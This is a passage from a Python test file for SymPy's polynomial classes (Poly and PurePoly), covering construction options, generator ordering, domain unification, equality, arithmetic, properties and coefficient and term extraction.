raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=False))
raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=False))
raises(NotImplementedError, lambda: Poly(x + 1, x, modulus=3, order='grlex'))
raises(NotImplementedError, lambda: Poly(x + 1, x, order='grlex'))
raises(GeneratorsNeeded, lambda: Poly({1: 2, 0: 1}))
raises(GeneratorsNeeded, lambda: Poly([2, 1]))
raises(GeneratorsNeeded, lambda: Poly((2, 1)))
raises(GeneratorsNeeded, lambda: Poly(1))
f = a*x**2 + b*x + c
assert Poly({2: a, 1: b, 0: c}, x) == f
assert Poly(iter([a, b, c]), x) == f
assert Poly([a, b, c], x) == f
assert Poly((a, b, c), x) == f
f = Poly({}, x, y, z)
assert f.gens == (x, y, z) and f.as_expr() == 0
assert Poly(Poly(a*x + b*y, x, y), x) == Poly(a*x + b*y, x)
assert Poly(3*x**2 + 2*x + 1, domain='ZZ').all_coeffs() == [3, 2, 1]
assert Poly(3*x**2 + 2*x + 1, domain='QQ').all_coeffs() == [3, 2, 1]
assert Poly(3*x**2 + 2*x + 1, domain='RR').all_coeffs() == [3.0, 2.0, 1.0]
raises(CoercionFailed, lambda: Poly(3*x**2/5 + 2*x/5 + 1, domain='ZZ'))
assert Poly(
3*x**2/5 + 2*x/5 + 1, domain='QQ').all_coeffs() == [S(3)/5, S(2)/5, 1]
assert _epsilon_eq(
Poly(3*x**2/5 + 2*x/5 + 1, domain='RR').all_coeffs(), [0.6, 0.4, 1.0])
assert Poly(3.0*x**2 + 2.0*x + 1, domain='ZZ').all_coeffs() == [3, 2, 1]
assert Poly(3.0*x**2 + 2.0*x + 1, domain='QQ').all_coeffs() == [3, 2, 1]
assert Poly(
3.0*x**2 + 2.0*x + 1, domain='RR').all_coeffs() == [3.0, 2.0, 1.0]
raises(CoercionFailed, lambda: Poly(3.1*x**2 + 2.1*x + 1, domain='ZZ'))
assert Poly(3.1*x**2 + 2.1*x + 1, domain='QQ').all_coeffs() == [S(31)/10, S(21)/10, 1]
assert Poly(3.1*x**2 + 2.1*x + 1, domain='RR').all_coeffs() == [3.1, 2.1, 1.0]
assert Poly({(2, 1): 1, (1, 2): 2, (1, 1): 3}, x, y) == \
Poly(x**2*y + 2*x*y**2 + 3*x*y, x, y)
assert Poly(x**2 + 1, extension=I).get_domain() == QQ.algebraic_field(I)
f = 3*x**5 - x**4 + x**3 - x** 2 + 65538
assert Poly(f, x, modulus=65537, symmetric=True) == \
Poly(3*x**5 - x**4 + x**3 - x** 2 + 1, x, modulus=65537,
symmetric=True)
assert Poly(f, x, modulus=65537, symmetric=False) == \
Poly(3*x**5 + 65536*x**4 + x**3 + 65536*x** 2 + 1, x,
modulus=65537, symmetric=False)
assert isinstance(Poly(x**2 + x + 1.0).get_domain(), RealField)
def test_Poly__args():
assert Poly(x**2 + 1).args == (x**2 + 1,)
def test_Poly__gens():
assert Poly((x - p)*(x - q), x).gens == (x,)
assert Poly((x - p)*(x - q), p).gens == (p,)
assert Poly((x - p)*(x - q), q).gens == (q,)
assert Poly((x - p)*(x - q), x, p).gens == (x, p)
assert Poly((x - p)*(x - q), x, q).gens == (x, q)
assert Poly((x - p)*(x - q), x, p, q).gens == (x, p, q)
assert Poly((x - p)*(x - q), p, x, q).gens == (p, x, q)
assert Poly((x - p)*(x - q), p, q, x).gens == (p, q, x)
assert Poly((x - p)*(x - q)).gens == (x, p, q)
assert Poly((x - p)*(x - q), sort='x > p > q').gens == (x, p, q)
assert Poly((x - p)*(x - q), sort='p > x > q').gens == (p, x, q)
assert Poly((x - p)*(x - q), sort='p > q > x').gens == (p, q, x)
assert Poly((x - p)*(x - q), x, p, q, sort='p > q > x').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='x').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='p').gens == (p, x, q)
assert Poly((x - p)*(x - q), wrt='q').gens == (q, x, p)
assert Poly((x - p)*(x - q), wrt=x).gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt=p).gens == (p, x, q)
assert Poly((x - p)*(x - q), wrt=q).gens == (q, x, p)
assert Poly((x - p)*(x - q), x, p, q, wrt='p').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='p', sort='q > x').gens == (p, q, x)
assert Poly((x - p)*(x - q), wrt='q', sort='p > x').gens == (q, p, x)
def test_Poly_zero():
assert Poly(x).zero == Poly(0, x, domain=ZZ)
assert Poly(x/2).zero == Poly(0, x, domain=QQ)
def test_Poly_one():
assert Poly(x).one == Poly(1, x, domain=ZZ)
assert Poly(x/2).one == Poly(1, x, domain=QQ)
def test_Poly__unify():
raises(UnificationFailed, lambda: Poly(x)._unify(y))
F3 = FF(3)
F5 = FF(5)
assert Poly(x, x, modulus=3)._unify(Poly(y, y, modulus=3))[2:] == (
DMP([[F3(1)], []], F3), DMP([[F3(1), F3(0)]], F3))
assert Poly(x, x, modulus=3)._unify(Poly(y, y, modulus=5))[2:] == (
DMP([[F5(1)], []], F5), DMP([[F5(1), F5(0)]], F5))
assert Poly(y, x, y)._unify(Poly(x, x, modulus=3))[2:] == (DMP([[F3(1), F3(0)]], F3), DMP([[F3(1)], []], F3))
assert Poly(x, x, modulus=3)._unify(Poly(y, x, y))[2:] == (DMP([[F3(1)], []], F3), DMP([[F3(1), F3(0)]], F3))
assert Poly(x + 1, x)._unify(Poly(x + 2, x))[2:] == (DMP([1, 1], ZZ), DMP([1, 2], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([1, 1], QQ), DMP([1, 2], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([1, 1], QQ), DMP([1, 2], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, y, x))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, y, x))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, y, x, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, y, x, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, y, x))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, y, x))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, y, x, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, y, x, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
F, A, B = field("a,b", ZZ)
assert Poly(a*x, x, domain='ZZ[a]')._unify(Poly(a*b*x, x, domain='ZZ(a,b)'))[2:] == \
(DMP([A, F(0)], F.to_domain()), DMP([A*B, F(0)], F.to_domain()))
assert Poly(a*x, x, domain='ZZ(a)')._unify(Poly(a*b*x, x, domain='ZZ(a,b)'))[2:] == \
(DMP([A, F(0)], F.to_domain()), DMP([A*B, F(0)], F.to_domain()))
raises(CoercionFailed, lambda: Poly(Poly(x**2 + x**2*z, y, field=True), domain='ZZ(x)'))
f = Poly(t**2 + t/3 + x, t, domain='QQ(x)')
g = Poly(t**2 + t/3 + x, t, domain='QQ[x]')
assert f._unify(g)[2:] == (f.rep, f.rep)
def test_Poly_free_symbols():
assert Poly(x**2 + 1).free_symbols == set([x])
assert Poly(x**2 + y*z).free_symbols == set([x, y, z])
assert Poly(x**2 + y*z, x).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z)).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z), x).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z), x, domain=EX).free_symbols == set([x, y, z])
def test_PurePoly_free_symbols():
assert PurePoly(x**2 + 1).free_symbols == set([])
assert PurePoly(x**2 + y*z).free_symbols == set([])
assert PurePoly(x**2 + y*z, x).free_symbols == set([y, z])
assert PurePoly(x**2 + sin(y*z)).free_symbols == set([])
assert PurePoly(x**2 + sin(y*z), x).free_symbols == set([y, z])
assert PurePoly(x**2 + sin(y*z), x, domain=EX).free_symbols == set([y, z])
def test_Poly__eq__():
assert (Poly(x, x) == Poly(x, x)) is True
assert (Poly(x, x, domain=QQ) == Poly(x, x)) is True
assert (Poly(x, x) == Poly(x, x, domain=QQ)) is True
assert (Poly(x, x, domain=ZZ[a]) == Poly(x, x)) is True
assert (Poly(x, x) == Poly(x, x, domain=ZZ[a])) is True
assert (Poly(x*y, x, y) == Poly(x, x)) is False
assert (Poly(x, x, y) == Poly(x, x)) is False
assert (Poly(x, x) == Poly(x, x, y)) is False
assert (Poly(x**2 + 1, x) == Poly(y**2 + 1, y)) is False
assert (Poly(y**2 + 1, y) == Poly(x**2 + 1, x)) is False
f = Poly(x, x, domain=ZZ)
g = Poly(x, x, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
t0 = Symbol('t0')
f = Poly((t0/2 + x**2)*t**2 - x**2*t, t, domain='QQ[x,t0]')
g = Poly((t0/2 + x**2)*t**2 - x**2*t, t, domain='ZZ(x,t0)')
assert (f == g) is True
def test_PurePoly__eq__():
assert (PurePoly(x, x) == PurePoly(x, x)) is True
assert (PurePoly(x, x, domain=QQ) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=QQ)) is True
assert (PurePoly(x, x, domain=ZZ[a]) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=ZZ[a])) is True
assert (PurePoly(x*y, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x) == PurePoly(x, x, y)) is False
assert (PurePoly(x**2 + 1, x) == PurePoly(y**2 + 1, y)) is True
assert (PurePoly(y**2 + 1, y) == PurePoly(x**2 + 1, x)) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(x, x, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(y, y, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
def test_PurePoly_Poly():
assert isinstance(PurePoly(Poly(x**2 + 1)), PurePoly) is True
assert isinstance(Poly(PurePoly(x**2 + 1)), Poly) is True
def test_Poly_get_domain():
assert Poly(2*x).get_domain() == ZZ
assert Poly(2*x, domain='ZZ').get_domain() == ZZ
assert Poly(2*x, domain='QQ').get_domain() == QQ
assert Poly(x/2).get_domain() == QQ
raises(CoercionFailed, lambda: Poly(x/2, domain='ZZ'))
assert Poly(x/2, domain='QQ').get_domain() == QQ
assert isinstance(Poly(0.2*x).get_domain(), RealField)
def test_Poly_set_domain():
assert Poly(2*x + 1).set_domain(ZZ) == Poly(2*x + 1)
assert Poly(2*x + 1).set_domain('ZZ') == Poly(2*x + 1)
assert Poly(2*x + 1).set_domain(QQ) == Poly(2*x + 1, domain='QQ')
assert Poly(2*x + 1).set_domain('QQ') == Poly(2*x + 1, domain='QQ')
assert Poly(S(2)/10*x + S(1)/10).set_domain('RR') == Poly(0.2*x + 0.1)
assert Poly(0.2*x + 0.1).set_domain('QQ') == Poly(S(2)/10*x + S(1)/10)
raises(CoercionFailed, lambda: Poly(x/2 + 1).set_domain(ZZ))
raises(CoercionFailed, lambda: Poly(x + 1, modulus=2).set_domain(QQ))
raises(GeneratorsError, lambda: Poly(x*y, x, y).set_domain(ZZ[y]))
def test_Poly_get_modulus():
assert Poly(x**2 + 1, modulus=2).get_modulus() == 2
raises(PolynomialError, lambda: Poly(x**2 + 1).get_modulus())
def test_Poly_set_modulus():
assert Poly(
x**2 + 1, modulus=2).set_modulus(7) == Poly(x**2 + 1, modulus=7)
assert Poly(
x**2 + 5, modulus=7).set_modulus(2) == Poly(x**2 + 1, modulus=2)
assert Poly(x**2 + 1).set_modulus(2) == Poly(x**2 + 1, modulus=2)
raises(CoercionFailed, lambda: Poly(x/2 + 1).set_modulus(2))
def test_Poly_add_ground():
assert Poly(x + 1).add_ground(2) == Poly(x + 3)
def test_Poly_sub_ground():
assert Poly(x + 1).sub_ground(2) == Poly(x - 1)
def test_Poly_mul_ground():
assert Poly(x + 1).mul_ground(2) == Poly(2*x + 2)
def test_Poly_quo_ground():
assert Poly(2*x + 4).quo_ground(2) == Poly(x + 2)
assert Poly(2*x + 3).quo_ground(2) == Poly(x + 1)
def test_Poly_exquo_ground():
assert Poly(2*x + 4).exquo_ground(2) == Poly(x + 2)
raises(ExactQuotientFailed, lambda: Poly(2*x + 3).exquo_ground(2))
def test_Poly_abs():
assert Poly(-x + 1, x).abs() == abs(Poly(-x + 1, x)) == Poly(x + 1, x)
def test_Poly_neg():
assert Poly(-x + 1, x).neg() == -Poly(-x + 1, x) == Poly(x - 1, x)
def test_Poly_add():
assert Poly(0, x).add(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) + Poly(0, x) == Poly(0, x)
assert Poly(1, x).add(Poly(0, x)) == Poly(1, x)
assert Poly(1, x, y) + Poly(0, x) == Poly(1, x, y)
assert Poly(0, x).add(Poly(1, x, y)) == Poly(1, x, y)
assert Poly(0, x, y) + Poly(1, x, y) == Poly(1, x, y)
assert Poly(1, x) + x == Poly(x + 1, x)
assert Poly(1, x) + sin(x) == 1 + sin(x)
assert Poly(x, x) + 1 == Poly(x + 1, x)
assert 1 + Poly(x, x) == Poly(x + 1, x)
def test_Poly_sub():
assert Poly(0, x).sub(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) - Poly(0, x) == Poly(0, x)
assert Poly(1, x).sub(Poly(0, x)) == Poly(1, x)
assert Poly(1, x, y) - Poly(0, x) == Poly(1, x, y)
assert Poly(0, x).sub(Poly(1, x, y)) == Poly(-1, x, y)
assert Poly(0, x, y) - Poly(1, x, y) == Poly(-1, x, y)
assert Poly(1, x) - x == Poly(1 - x, x)
assert Poly(1, x) - sin(x) == 1 - sin(x)
assert Poly(x, x) - 1 == Poly(x - 1, x)
assert 1 - Poly(x, x) == Poly(1 - x, x)
def test_Poly_mul():
assert Poly(0, x).mul(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) * Poly(0, x) == Poly(0, x)
assert Poly(2, x).mul(Poly(4, x)) == Poly(8, x)
assert Poly(2, x, y) * Poly(4, x) == Poly(8, x, y)
assert Poly(4, x).mul(Poly(2, x, y)) == Poly(8, x, y)
assert Poly(4, x, y) * Poly(2, x, y) == Poly(8, x, y)
assert Poly(1, x) * x == Poly(x, x)
assert Poly(1, x) * sin(x) == sin(x)
assert Poly(x, x) * 2 == Poly(2*x, x)
assert 2 * Poly(x, x) == Poly(2*x, x)
def test_Poly_sqr():
assert Poly(x*y, x, y).sqr() == Poly(x**2*y**2, x, y)
def test_Poly_pow():
assert Poly(x, x).pow(10) == Poly(x**10, x)
assert Poly(x, x).pow(Integer(10)) == Poly(x**10, x)
assert Poly(2*y, x, y).pow(4) == Poly(16*y**4, x, y)
assert Poly(2*y, x, y).pow(Integer(4)) == Poly(16*y**4, x, y)
assert Poly(7*x*y, x, y)**3 == Poly(343*x**3*y**3, x, y)
assert Poly(x*y + 1, x, y)**(-1) == (x*y + 1)**(-1)
assert Poly(x*y + 1, x, y)**x == (x*y + 1)**x
def test_Poly_divmod():
f, g = Poly(x**2), Poly(x)
q, r = g, Poly(0, x)
assert divmod(f, g) == (q, r)
assert f // g == q
assert f % g == r
assert divmod(f, x) == (q, r)
assert f // x == q
assert f % x == r
q, r = Poly(0, x), Poly(2, x)
assert divmod(2, g) == (q, r)
assert 2 // g == q
assert 2 % g == r
assert Poly(x)/Poly(x) == 1
assert Poly(x**2)/Poly(x) == x
assert Poly(x)/Poly(x**2) == 1/x
def test_Poly_eq_ne():
assert (Poly(x + y, x, y) == Poly(x + y, x, y)) is True
assert (Poly(x + y, x) == Poly(x + y, x, y)) is False
assert (Poly(x + y, x, y) == Poly(x + y, x)) is False
assert (Poly(x + y, x) == Poly(x + y, x)) is True
assert (Poly(x + y, y) == Poly(x + y, y)) is True
assert (Poly(x + y, x, y) == x + y) is True
assert (Poly(x + y, x) == x + y) is True
assert (Poly(x + y, x, y) == x + y) is True
assert (Poly(x + y, x) == x + y) is True
assert (Poly(x + y, y) == x + y) is True
assert (Poly(x + y, x, y) != Poly(x + y, x, y)) is False
assert (Poly(x + y, x) != Poly(x + y, x, y)) is True
assert (Poly(x + y, x, y) != Poly(x + y, x)) is True
assert (Poly(x + y, x) != Poly(x + y, x)) is False
assert (Poly(x + y, y) != Poly(x + y, y)) is False
assert (Poly(x + y, x, y) != x + y) is False
assert (Poly(x + y, x) != x + y) is False
assert (Poly(x + y, x, y) != x + y) is False
assert (Poly(x + y, x) != x + y) is False
assert (Poly(x + y, y) != x + y) is False
assert (Poly(x, x) == sin(x)) is False
assert (Poly(x, x) != sin(x)) is True
def test_Poly_nonzero():
assert not bool(Poly(0, x)) is True
assert not bool(Poly(1, x)) is False
def test_Poly_properties():
assert Poly(0, x).is_zero is True
assert Poly(1, x).is_zero is False
assert Poly(1, x).is_one is True
assert Poly(2, x).is_one is False
assert Poly(x - 1, x).is_sqf is True
assert Poly((x - 1)**2, x).is_sqf is False
assert Poly(x - 1, x).is_monic is True
assert Poly(2*x - 1, x).is_monic is False
assert Poly(3*x + 2, x).is_primitive is True
assert Poly(4*x + 2, x).is_primitive is False
assert Poly(1, x).is_ground is True
assert Poly(x, x).is_ground is False
assert Poly(x + y + z + 1).is_linear is True
assert Poly(x*y*z + 1).is_linear is False
assert Poly(x*y + z + 1).is_quadratic is True
assert Poly(x*y*z + 1).is_quadratic is False
assert Poly(x*y).is_monomial is True
assert Poly(x*y + 1).is_monomial is False
assert Poly(x**2 + x*y).is_homogeneous is True
assert Poly(x**3 + x*y).is_homogeneous is False
assert Poly(x).is_univariate is True
assert Poly(x*y).is_univariate is False
assert Poly(x*y).is_multivariate is True
assert Poly(x).is_multivariate is False
assert Poly(
x**16 + x**14 - x**10 + x**8 - x**6 + x**2 + 1).is_cyclotomic is False
assert Poly(
x**16 + x**14 - x**10 - x**8 - x**6 + x**2 + 1).is_cyclotomic is True
def test_Poly_is_irreducible():
assert Poly(x**2 + x + 1).is_irreducible is True
assert Poly(x**2 + 2*x + 1).is_irreducible is False
assert Poly(7*x + 3, modulus=11).is_irreducible is True
assert Poly(7*x**2 + 3*x + 1, modulus=11).is_irreducible is False
def test_Poly_subs():
assert Poly(x + 1).subs(x, 0) == 1
assert Poly(x + 1).subs(x, x) == Poly(x + 1)
assert Poly(x + 1).subs(x, y) == Poly(y + 1)
assert Poly(x*y, x).subs(y, x) == x**2
assert Poly(x*y, x).subs(x, y) == y**2
def test_Poly_replace():
assert Poly(x + 1).replace(x) == Poly(x + 1)
assert Poly(x + 1).replace(y) == Poly(y + 1)
raises(PolynomialError, lambda: Poly(x + y).replace(z))
assert Poly(x + 1).replace(x, x) == Poly(x + 1)
assert Poly(x + 1).replace(x, y) == Poly(y + 1)
assert Poly(x + y).replace(x, x) == Poly(x + y)
assert Poly(x + y).replace(x, z) == Poly(z + y, z, y)
assert Poly(x + y).replace(y, y) == Poly(x + y)
assert Poly(x + y).replace(y, z) == Poly(x + z, x, z)
raises(PolynomialError, lambda: Poly(x + y).replace(x, y))
raises(PolynomialError, lambda: Poly(x + y).replace(z, t))
assert Poly(x + y, x).replace(x, z) == Poly(z + y, z)
assert Poly(x + y, y).replace(y, z) == Poly(x + z, z)
raises(PolynomialError, lambda: Poly(x + y, x).replace(x, y))
raises(PolynomialError, lambda: Poly(x + y, y).replace(y, x))
def test_Poly_reorder():
raises(PolynomialError, lambda: Poly(x + y).reorder(x, z))
assert Poly(x + y, x, y).reorder(x, y) == Poly(x + y, x, y)
assert Poly(x + y, x, y).reorder(y, x) == Poly(x + y, y, x)
assert Poly(x + y, y, x).reorder(x, y) == Poly(x + y, x, y)
assert Poly(x + y, y, x).reorder(y, x) == Poly(x + y, y, x)
assert Poly(x + y, x, y).reorder(wrt=x) == Poly(x + y, x, y)
assert Poly(x + y, x, y).reorder(wrt=y) == Poly(x + y, y, x)
def test_Poly_ltrim():
f = Poly(y**2 + y*z**2, x, y, z).ltrim(y)
assert f.as_expr() == y**2 + y*z**2 and f.gens == (y, z)
raises(PolynomialError, lambda: Poly(x*y**2 + y**2, x, y).ltrim(y))
def test_Poly_has_only_gens():
assert Poly(x*y + 1, x, y, z).has_only_gens(x, y) is True
assert Poly(x*y + z, x, y, z).has_only_gens(x, y) is False
raises(GeneratorsError, lambda: Poly(x*y**2 + y**2, x, y).has_only_gens(t))
def test_Poly_to_ring():
assert Poly(2*x + 1, domain='ZZ').to_ring() == Poly(2*x + 1, domain='ZZ')
assert Poly(2*x + 1, domain='QQ').to_ring() == Poly(2*x + 1, domain='ZZ')
raises(CoercionFailed, lambda: Poly(x/2 + 1).to_ring())
raises(DomainError, lambda: Poly(2*x + 1, modulus=3).to_ring())
def test_Poly_to_field():
assert Poly(2*x + 1, domain='ZZ').to_field() == Poly(2*x + 1, domain='QQ')
assert Poly(2*x + 1, domain='QQ').to_field() == Poly(2*x + 1, domain='QQ')
assert Poly(x/2 + 1, domain='QQ').to_field() == Poly(x/2 + 1, domain='QQ')
assert Poly(2*x + 1, modulus=3).to_field() == Poly(2*x + 1, modulus=3)
assert Poly(2.0*x + 1.0).to_field() == Poly(2.0*x + 1.0)
def test_Poly_to_exact():
assert Poly(2*x).to_exact() == Poly(2*x)
assert Poly(x/2).to_exact() == Poly(x/2)
assert Poly(0.1*x).to_exact() == Poly(x/10)
def test_Poly_retract():
f = Poly(x**2 + 1, x, domain=QQ[y])
assert f.retract() == Poly(x**2 + 1, x, domain='ZZ')
assert f.retract(field=True) == Poly(x**2 + 1, x, domain='QQ')
assert Poly(0, x, y).retract() == Poly(0, x, y)
def test_Poly_slice():
f = Poly(x**3 + 2*x**2 + 3*x + 4)
assert f.slice(0, 0) == Poly(0, x)
assert f.slice(0, 1) == Poly(4, x)
assert f.slice(0, 2) == Poly(3*x + 4, x)
assert f.slice(0, 3) == Poly(2*x**2 + 3*x + 4, x)
assert f.slice(0, 4) == Poly(x**3 + 2*x**2 + 3*x + 4, x)
assert f.slice(x, 0, 0) == Poly(0, x)
assert f.slice(x, 0, 1) == Poly(4, x)
assert f.slice(x, 0, 2) == Poly(3*x + 4, x)
assert f.slice(x, 0, 3) == Poly(2*x**2 + 3*x + 4, x)
assert f.slice(x, 0, 4) == Poly(x**3 + 2*x**2 + 3*x + 4, x)
def test_Poly_coeffs():
assert Poly(0, x).coeffs() == [0]
assert Poly(1, x).coeffs() == [1]
assert Poly(2*x + 1, x).coeffs() == [2, 1]
assert Poly(7*x**2 + 2*x + 1, x).coeffs() == [7, 2, 1]
assert Poly(7*x**4 + 2*x + 1, x).coeffs() == [7, 2, 1]
assert Poly(x*y**7 + 2*x**2*y**3).coeffs('lex') == [2, 1]
assert Poly(x*y**7 + 2*x**2*y**3).coeffs('grlex') == [1, 2]
def test_Poly_monoms():
assert Poly(0, x).monoms() == [(0,)]
assert Poly(1, x).monoms() == [(0,)]
assert Poly(2*x + 1, x).monoms() == [(1,), (0,)]
assert Poly(7*x**2 + 2*x + 1, x).monoms() == [(2,), (1,), (0,)]
assert Poly(7*x**4 + 2*x + 1, x).monoms() == [(4,), (1,), (0,)]
assert Poly(x*y**7 + 2*x**2*y**3).monoms('lex') == [(2, 3), (1, 7)]
assert Poly(x*y**7 + 2*x**2*y**3).monoms('grlex') == [(1, 7), (2, 3)]
def test_Poly_terms():
assert Poly(0, x).terms() == [((0,), 0)]
assert Poly(1, x).terms() == [((0,), 1)]
assert Poly(2*x + 1, x).terms() == [((1,), 2), ((0,), 1)]
assert Poly(7*x**2 + 2*x + 1, x).terms() == [((2,), 7), ((1,), 2), ((0,), 1)]
assert Poly(7*x**4 + 2*x + 1, x).terms() == [((4,), 7), ((1,), 2), ((0,), 1)]
assert Poly(
x*y**7 + 2*x**2*y**3).terms('lex') == [((2, 3), 2), ((1, 7), 1)]
assert Poly(
x*y**7 + 2*x**2*y**3).terms('grlex') == [((1, 7), 1), ((2, 3), 2)]
def test_Poly_all_coeffs():
assert Poly(0, x).all_coeffs() == [0]
assert Poly(1, x).all_coeffs() == [1]
assert Poly(2*x + 1, x).all_coeffs() == [2, 1]
assert Poly(7*x**2 + 2*x + 1, x).all_coeffs() == [7, 2, 1]
assert Poly(7*x**4 + 2*x + 1, x).all_coeffs() == [7, 0, 0, 2, 1]
def test_Poly_all_monoms():
assert Poly(0, x).all_monoms() == [(0,)]
assert Poly(1, x).all_monoms() == [(0,)]
assert Poly(2*x + 1, x).all_monoms() == [(1,), (0,)]
assert Poly(7*x**2 + 2*x + 1, x).all_monoms() == [(2,), (1,), (0,)]
assert Poly(7*x**4 + 2*x + 1, x).all_monoms() == [(4,), (3,), (2,), (1,), (0,)]
def test_Poly_all_terms():
assert Poly(0, x).all_terms() == [((0,), 0)]
assert Poly(1, x).all_terms() == [((0,), 1)]
assert Poly(2*x + 1, x).all_terms() == [((1,), 2), ((0,), 1)]
assert Poly(7*x**2 + 2*x + 1, x).all_terms() == \
[((2,), 7), ((1,), 2), ((0,), 1)]
assert Poly(7*x**4 + 2*x + 1, x).all_terms() == \
[((4,), 7), ((3,), 0), ((2,), 0), ((1,), 2), ((0,), 1)]
def test_Poly_termwise():
f = Poly(x**2 + 20*x + 400)
g = Poly(x**2 + 2*x + 4)
def func(monom, coeff):
(k,) = monom
return coeff//10**(2 - k)
assert f.termwise(func) == g
def func(monom, coeff):
(k,) = monom
return (k,), coeff//10**(2 - k)
assert f.termwise(func) == g
def test_Poly_length():
assert Poly(0, x).length() == 0
assert Poly(1, x).length() == 1
assert Poly(x, x).length() == 1
assert Poly(x + 1, x).length() == 2
assert Poly(x**2 + 1, x).length() == 2
assert Poly(x**2 + x + 1, x).length() == 3
def test_Poly_as_dict():
assert Poly(0, x).as_dict() == {}
assert Poly(0, x, y, z).as_dict() == {}
assert Poly(1, x).as_dict() == {(0,): 1}
assert Poly(1, x, y, z).as_dict() == {(0, 0, 0): 1}
assert Poly(x**2 + 3, x).as_dict() == {(2,): 1, (0,): 3}
assert Poly(x**2 + 3, x, y, z).as_dict() == {(2, 0, 0): 1, (0, 0, 0): 3}
assert Poly(3*x**2*y*z**3 + 4*x*y + 5*x*z).as_dict() == {(2, 1, 3): 3,
(1, 1, 0): 4, (1, 0, 1): 5}
def test_Poly_as_expr():
assert Poly(0, x).as_expr() == 0
assert Poly(0, x, y, z).as_expr() == 0
assert Poly(1, x).as_expr() == 1
assert Poly(1, x, y, z).as_expr() == 1
assert Poly(x**2 + 3, x).as_expr() == x**2 + 3
assert Poly(x**2 + 3, x, y, z).as_expr() == x**2 + 3
assert Poly(
3*x**2*y*z**3 + 4*x*y + 5*x*z).as_expr() == 3*x**2*y*z**3 + 4*x*y + 5*x*z
f = Poly(x**2 + 2*x*y**2 - y, x, y)
assert f.as_expr() == -y + x**2 + 2*x*y**2
assert f.as_expr({x: 5}) == 25 - y + 10*y**2
assert f.as_expr({y: 6}) == -6 + 72*x + x**2
